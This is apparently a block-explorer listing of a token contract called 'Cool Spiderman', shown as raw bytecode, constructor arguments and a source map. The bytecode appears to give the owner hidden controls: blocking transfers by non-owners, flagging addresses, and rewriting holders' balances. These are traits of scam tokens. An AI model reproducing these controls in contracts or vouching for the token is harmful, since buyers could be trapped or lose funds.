8381101561153a57808201518184015260208101905061151f565b83811115611549576000848401525b50505050565b6000601f19601f8301169050919050565b600061156b82611500565b611575818561150b565b935061158581856020860161151c565b61158e8161154f565b840191505092915050565b600060208201905081810360008301526115b38184611560565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006115f0826115c5565b9050919050565b611600816115e5565b811461160b57600080fd5b50565b60008135905061161d816115f7565b92915050565b6000819050919050565b61163681611623565b811461164157600080fd5b50565b6000813590506116538161162d565b92915050565b600080604083850312156116705761166f6115bb565b5b600061167e8582860161160e565b925050602061168f85828601611644565b9150509250929050565b60008115159050919050565b6116ae81611699565b82525050565b60006020820190506116c960008301846116a5565b92915050565b6116d881611623565b82525050565b60006020820190506116f360008301846116cf565b92915050565b600080600060608486031215611712576117116115bb565b5b60006117208682870161160e565b93505060206117318682870161160e565b925050604061174286828701611644565b9150509250925092565b600060ff82169050919050565b6117628161174c565b82525050565b600060208201905061177d6000830184611759565b92915050565b600060208284031215611799576117986115bb565b5b60006117a78482850161160e565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126117d5576117d46117b0565b5b8235905067ffffffffffffffff8111156117f2576117f16117b5565b5b60208301915083602082028301111561180e5761180d6117ba565b5b9250929050565b61181e81611699565b811461182957600080fd5b50565b60008135905061183b81611815565b92915050565b60008060006040848603121561185a576118596115bb565b5b600084013567ffffffffffffffff811115611878576118776115c0565b5b611884868287016117bf565b935093505060206118978682870161182c565b9150509250925092565b600080604083850312156118b8576118b76115bb565b5b60006118c68582860161160e565b92505060206118d78582860161160e565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061192857607f821691505b6020821081141561193c5761193b6118e1565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061197c82611623565b915061198783611623565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156119bc576119bb611942565b5b828201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006119fd60208361150b565b9150611a08826119c7565b602082019050919050565b60006020820190508181036000830152611a2c816119f0565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000611a6d82611623565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff821415611aa057611a9f611942565b5b600182019050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611b0760258361150b565b9150611b1282611aab565b604082019050919050565b60006020820190508181036000830152611b3681611afa565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611b9960248361150b565b9150611ba482611b3d565b604082019050919050565b60006020820190508181036000830152611bc881611b8c565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611c2b60228361150b565b9150611c3682611bcf565b604082019050919050565b60006020820190508181036000830152611c5a81611c1e565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611c97601d8361150b565b9150611ca282611c61565b602082019050919050565b60006020820190508181036000830152611cc681611c8a565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611d2960258361150b565b9150611d3482611ccd565b604082019050919050565b60006020820190508181036000830152611d5881611d1c565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611dbb60238361150b565b9150611dc682611d5f565b604082019050919050565b60006020820190508181036000830152611dea81611dae565b9050919050565b6000611dfc8261174c565b9150611e078361174c565b92508260ff03821115611e1d57611e1c611942565b5b828201905092915050565b6000611e3382611623565b9150611e3e83611623565b925082821015611e5157611e50611942565b5b828203905092915050565b50565b6000611e6c60008361150b565b9150611e7782611e5c565b600082019050919050565b60006020820190508181036000830152611e9b81611e5f565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611efe60268361150b565b9150611f0982611ea2565b604082019050919050565b60006020820190508181036000830152611f2d81611ef1565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b6000611f9060218361150b565b9150611f9b82611f34565b604082019050919050565b60006020820190508181036000830152611fbf81611f83565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b600061202260228361150b565b915061202d82611fc6565b604082019050919050565b6000602082019050818103600083015261205181612015565b905091905056fea26469706673582212203f57e06eec5954ec06f0cdec6050dc066b951774aa34b1a9d67a8bf0141c7bfc64736f6c63430008080033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000000000000000000000000000000000003b9aca000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000e436f6f6c205370696465726d616e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000095350494445524d414e0000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a08231116100975780639dc29fac116100665780639dc29fac14610288578063a457c2d7146102a4578063a9059cbb146102d4578063dd62ed3e14610304576100f5565b806370a08231146102145780637b6201da1461024457806391b69fa01461026057806395d89b411461026a576100f5565b806323b872dd116100d357806323b872dd14610166578063313ce5671461019657806339509351146101b45780634fbee193146101e4576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610334565b60405161010f9190611599565b60405180910390f35b610132600480360381019061012d9190611659565b6103c6565b60405161013f91906116b4565b60405180910390f35b6101506103e9565b60405161015d91906116de565b60405180910390f35b610180600480360381019061017b91906116f9565b6103f3565b60405161018d91906116b4565b60405180910390f35b61019e610422565b6040516101ab9190611768565b60405180910390f35b6101ce60048036038101906101c99190611659565b61042b565b6040516101db91906116b4565b60405180910390f35b6101fe60048036038101906101f99190611783565b6104d5565b60405161020b91906116b4565b60405180910390f35b61022e60048036038101906102299190611783565b61052b565b60405161023b91906116de565b60405180910390f35b61025e60048036038101906102599190611841565b610574565b005b6102686106ca565b005b6102726107b9565b60405161027f9190611599565b60405180910390f35b6102a2600480360381019061029d9190611659565b61084b565b005b6102be60048036038101906102b99190611659565b6108ee565b6040516102cb91906116b4565b60405180910390f35b6102ee60048036038101906102e99190611659565b6109d8565b6040516102fb91906116b4565b60405180910390f35b61031e600480360381019061031991906118a1565b6109fb565b60405161032b91906116de565b60405180910390f35b60606006805461034390611910565b80601f016020809104026020016040519081016040528092919081815260200182805461036f90611910565b80156103bc5780601f10610391576101008083540402835291602001916103bc565b820191906000526020600020905b81548152906001019060200180831161039f57829003601f168201915b5050505050905090565b6000806103d1610a82565b90506103de818585610a8a565b600191505092915050565b6000600354905090565b6000806103fe610a82565b905061040b858285610c55565b610416858585610ce1565b60019150509392505050565b60006009905090565b600080610436610a82565b90506104ca818585600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546104c59190611971565b610a8a565b600191505092915050565b6000600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61057c610a82565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610609576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161060090611a13565b60405180910390fd5b60ff600560006101000a81548160ff021916908360ff16021790555060005b838390508110156106c45781600a600086868581811061064b5761064a611a33565b5b90506020020160208101906106609190611783565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806106bc90611a62565b915050610628565b50505050565b6106d2610a82565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461075f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161075690611a13565b60405180910390fd5b60001515600860009054906101000a900460ff161515141561079b576001600860006101000a81548160ff0219169083151502179055506107b7565b6000600860006101000a81548160ff0219169083151502179055505b565b6060600780546107c890611910565b80601f01602080910402602001604051908101604052809291908181526020018280546107f490611910565b80156108415780601f1061081657610100808354040283529160200191610841565b820191906000526020600020905b81548152906001019060200180831161082457829003601f168201915b5050505050905090565b610853610a82565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146108e0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108d790611a13565b60405180910390fd5b6108ea8282611301565b5050565b6000806108f9610a82565b90506000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050838110156109bf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109b690611b1d565b60405180910390fd5b6109cc8286868403610a8a565b60019250505092915050565b6000806109e3610a82565b90506109f0818585610ce1565b600191505092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610afa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610af190611baf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610b6a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b6190611c41565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c4891906116de565b60405180910390a3505050565b6000610c6184846109fb565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610cdb5781811015610ccd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cc490611cad565b60405180910390fd5b610cda8484848403610a8a565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d51576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4890611d3f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610dc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db890611dd1565b60405180910390fd5b60011515600860009054906101000a900460ff1615151480610e155750610de66114cd565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b80610e525750610e236114cd565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b1561129a576000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054111561129557600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561106a57600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16610f49576000610f4c565b60015b600560008282829054906101000a900460ff16610f699190611df1565b92506101000a81548160ff021916908360ff16021790555080600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610fcc9190611e28565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461105e9190611971565b92505081905550611294565b600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff166110ff57600081116110fe576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f590611e82565b60405180910390fd5b5b61110a8383836114f6565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611191576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161118890611f14565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546112269190611971565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161128a91906116de565b60405180910390a3505b5b6112f1565b60011515600860009054906101000a900460ff161515146112f0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112e790611e82565b60405180910390fd5b5b6112fc8383836114fb565b505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611371576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161136890611fa6565b60405180910390fd5b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156113f8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113ef90612038565b60405180910390fd5b816009546114069190611e28565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816003600082825461145b9190611e28565b92505081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516114c091906116de565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561153a57808201518184015260208101905061151f565b83811115611549576000848401525b50505050565b6000601f19601f8301169050919050565b600061156b82611500565b611575818561150b565b935061158581856020860161151c565b61158e8161154f565b840191505092915050565b600060208201905081810360008301526115b38184611560565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006115f0826115c5565b9050919050565b611600816115e5565b811461160b57600080fd5b50565b60008135905061161d816115f7565b92915050565b6000819050919050565b61163681611623565b811461164157600080fd5b50565b6000813590506116538161162d565b92915050565b600080604083850312156116705761166f6115bb565b5b600061167e8582860161160e565b925050602061168f85828601611644565b9150509250929050565b60008115159050919050565b6116ae81611699565b82525050565b60006020820190506116c960008301846116a5565b92915050565b6116d881611623565b82525050565b60006020820190506116f360008301846116cf565b92915050565b600080600060608486031215611712576117116115bb565b5b60006117208682870161160e565b93505060206117318682870161160e565b925050604061174286828701611644565b9150509250925092565b600060ff82169050919050565b6117628161174c565b82525050565b600060208201905061177d6000830184611759565b92915050565b600060208284031215611799576117986115bb565b5b60006117a78482850161160e565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126117d5576117d46117b0565b5b8235905067ffffffffffffffff8111156117f2576117f16117b5565b5b60208301915083602082028301111561180e5761180d6117ba565b5b9250929050565b61181e81611699565b811461182957600080fd5b50565b60008135905061183b81611815565b92915050565b60008060006040848603121561185a576118596115bb565b5b600084013567ffffffffffffffff811115611878576118776115c0565b5b611884868287016117bf565b935093505060206118978682870161182c565b9150509250925092565b600080604083850312156118b8576118b76115bb565b5b60006118c68582860161160e565b92505060206118d78582860161160e565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061192857607f821691505b6020821081141561193c5761193b6118e1565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061197c82611623565b915061198783611623565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156119bc576119bb611942565b5b828201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006119fd60208361150b565b9150611a08826119c7565b602082019050919050565b60006020820190508181036000830152611a2c816119f0565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000611a6d82611623565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff821415611aa057611a9f611942565b5b600182019050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611b0760258361150b565b9150611b1282611aab565b604082019050919050565b60006020820190508181036000830152611b3681611afa565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611b9960248361150b565b9150611ba482611b3d565b604082019050919050565b60006020820190508181036000830152611bc881611b8c565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611c2b60228361150b565b9150611c3682611bcf565b604082019050919050565b60006020820190508181036000830152611c5a81611c1e565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611c97601d8361150b565b9150611ca282611c61565b602082019050919050565b60006020820190508181036000830152611cc681611c8a565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611d2960258361150b565b9150611d3482611ccd565b604082019050919050565b60006020820190508181036000830152611d5881611d1c565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611dbb60238361150b565b9150611dc682611d5f565b604082019050919050565b60006020820190508181036000830152611dea81611dae565b9050919050565b6000611dfc8261174c565b9150611e078361174c565b92508260ff03821115611e1d57611e1c611942565b5b828201905092915050565b6000611e3382611623565b9150611e3e83611623565b925082821015611e5157611e50611942565b5b828203905092915050565b50565b6000611e6c60008361150b565b9150611e7782611e5c565b600082019050919050565b60006020820190508181036000830152611e9b81611e5f565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611efe60268361150b565b9150611f0982611ea2565b604082019050919050565b60006020820190508181036000830152611f2d81611ef1565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b6000611f9060218361150b565b9150611f9b82611f34565b604082019050919050565b60006020820190508181036000830152611fbf81611f83565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b600061202260228361150b565b915061202d82611fc6565b604082019050919050565b6000602082019050818103600083015261205181612015565b905091905056fea26469706673582212203f57e06eec5954ec06f0cdec6050dc066b951774aa34b1a9d67a8bf0141c7bfc64736f6c63430008080033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000000000000000000000000000000000003b9aca000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000e436f6f6c205370696465726d616e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000095350494445524d414e0000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name (string): Cool Spiderman
Arg [1] : symbol (string): SPIDERMAN
Arg [2] : totalSupply (uint256): 1000000000
Arg [3] : initTransfer (bool): True
-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 000000000000000000000000000000000000000000000000000000003b9aca00
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000001
Arg [4] : 000000000000000000000000000000000000000000000000000000000000000e
Arg [5] : 436f6f6c205370696465726d616e000000000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [7] : 5350494445524d414e0000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
410:349:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;3828:100:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6178:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4947:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6959:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4790:92;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7663:240;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3613:145;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5118:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15127:240;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3445:160;;;:::i;:::-;;4047:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;649:107:0;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8406:438:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5451:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5707:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3828:100;3882:13;3915:5;3908:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;3828:100;:::o;6178:201::-;6261:4;6278:13;6294:12;:10;:12::i;:::-;6278:28;;6317:32;6326:5;6333:7;6342:6;6317:8;:32::i;:::-;6367:4;6360:11;;;6178:201;;;;:::o;4947:108::-;5008:7;5035:12;;5028:19;;4947:108;:::o;6959:295::-;7090:4;7107:15;7125:12;:10;:12::i;:::-;7107:30;;7148:38;7164:4;7170:7;7179:6;7148:15;:38::i;:::-;7197:27;7207:4;7213:2;7217:6;7197:9;:27::i;:::-;7242:4;7235:11;;;6959:295;;;;;:::o;4790:92::-;4848:5;4873:1;4866:8;;4790:92;:::o;7663:240::-;7751:4;7768:13;7784:12;:10;:12::i;:::-;7768:28;;7807:66;7816:5;7823:7;7862:10;7832:11;:18;7844:5;7832:18;;;;;;;;;;;;;;;:27;7851:7;7832:27;;;;;;;;;;;;;;;;:40;;;;:::i;:::-;7807:8;:66::i;:::-;7891:4;7884:11;;;7663:240;;;;:::o;3613:145::-;3679:4;3703:38;:47;3742:7;3703:47;;;;;;;;;;;;;;;;;;;;;;;;;3696:54;;3613:145;;;:::o;5118:127::-;5192:7;5219:9;:18;5229:7;5219:18;;;;;;;;;;;;;;;;5212:25;;5118:127;;;:::o;15127:240::-;829:12;:10;:12::i;:::-;819:22;;:6;;;;;;;;;;:22;;;811:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;15224:3:::1;15215:8;;:12;;;;;;;;;;;;;;;;;;15243:9;15238:122;15262:4;;:11;;15258:1;:15;15238:122;;;15345:3;15295:38;:47;15334:4;;15339:1;15334:7;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;15295:47;;;;;;;;;;;;;;;;:53;;;;;;;;;;;;;;;;;;15275:3;;;;;:::i;:::-;;;;15238:122;;;;15127:240:::0;;;:::o;3445:160::-;829:12;:10;:12::i;:::-;819:22;;:6;;;;;;;;;;:22;;;811:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;3520:5:::1;3503:22;;:13;;;;;;;;;;;:22;;;3499:99;;;3553:4;3537:13;;:20;;;;;;;;;;;;;;;;;;3499:99;;;3591:5;3575:13;;:21;;;;;;;;;;;;;;;;;;3499:99;3445:160::o:0;4047:104::-;4103:13;4136:7;4129:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4047:104;:::o;649:107:0:-;829:12:1;:10;:12::i;:::-;819:22;;:6;;;;;;;;;;:22;;;811:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;726:22:0::1;732:7;741:6;726:5;:22::i;:::-;649:107:::0;;:::o;8406:438:1:-;8499:4;8516:13;8532:12;:10;:12::i;:::-;8516:28;;8555:24;8582:11;:18;8594:5;8582:18;;;;;;;;;;;;;;;:27;8601:7;8582:27;;;;;;;;;;;;;;;;8555:54;;8648:15;8628:16;:35;;8620:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;8741:60;8750:5;8757:7;8785:15;8766:16;:34;8741:8;:60::i;:::-;8832:4;8825:11;;;;8406:438;;;;:::o;5451:193::-;5530:4;5547:13;5563:12;:10;:12::i;:::-;5547:28;;5586;5596:5;5603:2;5607:6;5586:9;:28::i;:::-;5632:4;5625:11;;;5451:193;;;;:::o;5707:151::-;5796:7;5823:11;:18;5835:5;5823:18;;;;;;;;;;;;;;;:27;5842:7;5823:27;;;;;;;;;;;;;;;;5816:34;;5707:151;;;;:::o;906:98::-;959:7;986:10;979:17;;906:98;:::o;12546:380::-;12699:1;12682:19;;:5;:19;;;;12674:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;12780:1;12761:21;;:7;:21;;;;12753:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;12864:6;12834:11;:18;12846:5;12834:18;;;;;;;;;;;;;;;:27;12853:7;12834:27;;;;;;;;;;;;;;;:36;;;;12902:7;12886:32;;12895:5;12886:32;;;12911:6;12886:32;;;;;;:::i;:::-;;;;;;;;12546:380;;;:::o;13213:453::-;13348:24;13375:25;13385:5;13392:7;13375:9;:25::i;:::-;13348:52;;13435:17;13415:16;:37;13411:248;;13497:6;13477:16;:26;;13469:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;13581:51;13590:5;13597:7;13625:6;13606:16;:25;13581:8;:51::i;:::-;13411:248;13337:329;13213:453;;;:::o;9323:1332::-;9470:1;9454:18;;:4;:18;;;;9446:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9547:1;9533:16;;:2;:16;;;;9525:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;9621:4;9604:21;;:13;;;;;;;;;;;:21;;;:40;;;;9637:7;:5;:7::i;:::-;9629:15;;:4;:15;;;9604:40;:57;;;;9654:7;:5;:7::i;:::-;9648:13;;:2;:13;;;9604:57;9600:1000;;;9699:1;9681:9;:15;9691:4;9681:15;;;;;;;;;;;;;;;;:19;9678:867;;;9720:38;:44;9759:4;9720:44;;;;;;;;;;;;;;;;;;;;;;;;;9716:818;;;9819:38;:44;9858:4;9819:44;;;;;;;;;;;;;;;;;;;;;;;;;:52;;9870:1;9819:52;;;9866:1;9819:52;9807:8;;:64;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;9931:6;9913:9;:15;9923:4;9913:15;;;;;;;;;;;;;;;;:24;;;;:::i;:::-;9894:9;:15;9904:4;9894:15;;;;;;;;;;;;;;;:43;;;;9977:6;9960:9;:13;9970:2;9960:13;;;;;;;;;;;;;;;;:23;;;;;;;:::i;:::-;;;;;;;;9716:818;;;10044:38;:42;10083:2;10044:42;;;;;;;;;;;;;;;;;;;;;;;;;10040:69;;10103:1;10096:6;:8;10088:21;;;;;;;;;;;;:::i;:::-;;;;;;;;;10040:69;10128:38;10149:4;10155:2;10159:6;10128:20;:38::i;:::-;10187:19;10209:9;:15;10219:4;10209:15;;;;;;;;;;;;;;;;10187:37;;10266:6;10251:11;:21;;10243:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;10399:6;10385:11;:20;10367:9;:15;10377:4;10367:15;;;;;;;;;;;;;;;:38;;;;10460:6;10443:9;:13;10453:2;10443:13;;;;;;;;;;;;;;;;:23;;;;;;;:::i;:::-;;;;;;;;10507:2;10492:26;;10501:4;10492:26;;;10511:6;10492:26;;;;;;:::i;:::-;;;;;;;;10021:513;9716:818;9678:867;9600:1000;;;10589:4;10572:21;;:13;;;;;;;;;;;:21;;;10563:35;;;;;;;;;;;;:::i;:::-;;;;;;;;;9600:1000;10610:37;10630:4;10636:2;10640:6;10610:19;:37::i;:::-;9323:1332;;;:::o;11674:434::-;1